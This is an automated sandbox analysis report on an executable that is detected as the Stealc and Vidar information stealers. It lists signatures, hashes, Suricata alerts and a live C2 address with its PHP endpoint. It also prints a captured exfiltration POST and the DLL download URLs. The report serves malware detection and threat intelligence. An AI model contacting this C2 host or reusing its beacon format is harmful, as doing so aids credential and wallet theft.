Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1541753
MD5:	4bc4838890f52b86e8595449e053c634
SHA1:	bf434e7f111d0e8d9d87a244d781848f1d7de5e2
SHA256:	79791ed8ffba9931905a146913ac240bee35a0a5025e3070ff3e90200b1e91b0
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4BC4838890F52B86E8595449E053C634)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1937269330.000000000171E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1710578574.0000000005570000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 7352	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7352	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7352	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7352	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.be0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T05:21:04.602525+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T05:21:04.566633+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T05:21:04.879938+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T05:21:05.979482+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T05:21:04.887618+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T05:21:04.277751+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T05:21:06.507465+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:12.129929+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:13.369258+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:14.113653+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:14.756075+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:16.190511+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:16.676134+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 42 34 34 31 37 42 41 42 46 38 32 38 37 36 35 33 34 35 39 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"F1B4417BABF82876534592------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"doma------HDGIJJDGCBKFIDHIEBKE--

Source: file.exe, 00000000.00000002.1937269330.000000000171E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1937269330.0000000001777000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll3
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dllK
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dlla
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dllO
Source: file.exe, 00000000.00000002.1937269330.0000000001764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll%
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllY
Source: file.exe, 00000000.00000002.1937269330.000000000171E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime
Source: file.exe, 00000000.00000002.1937269330.0000000001777000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1937269330.0000000001777000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllE~4
Source: file.exe, 00000000.00000002.1937269330.0000000001764000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6o
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;i
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpBzi
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpFirefox
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpHi
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpVi
Source: file.exe, 00000000.00000002.1937269330.0000000001764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdllsi
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpfAi
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpnomi
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpoei
Source: file.exe, 00000000.00000002.1937269330.0000000001764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
Source: file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1937269330.0000000001764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
Source: file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37JJDHIE--
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1955906746.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1947879466.000000001DCCD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1955477368.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1952414241.0000000029C63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp, IEHDBGDHDAECBGDHJKFI.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1952414241.0000000029C63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp, IEHDBGDHDAECBGDHJKFI.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1952414241.0000000029C63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp, IEHDBGDHDAECBGDHJKFI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1952414241.0000000029C63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp, IEHDBGDHDAECBGDHJKFI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: IEHDBGDHDAECBGDHJKFI.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	String found in binary or memory: https://support.mozilla.org
Source: BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BGIJJKKJJDAAAAAKFHJJDGDAFB.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1795281516.000000001DBCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1795281516.000000001DBCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t
Source: file.exe, 00000000.00000002.1952414241.0000000029C63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1937269330.0000000001791000.00000004.00000020.00020000.00000000.sdmp, IEHDBGDHDAECBGDHJKFI.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1803797616.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, IECFBKFH.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
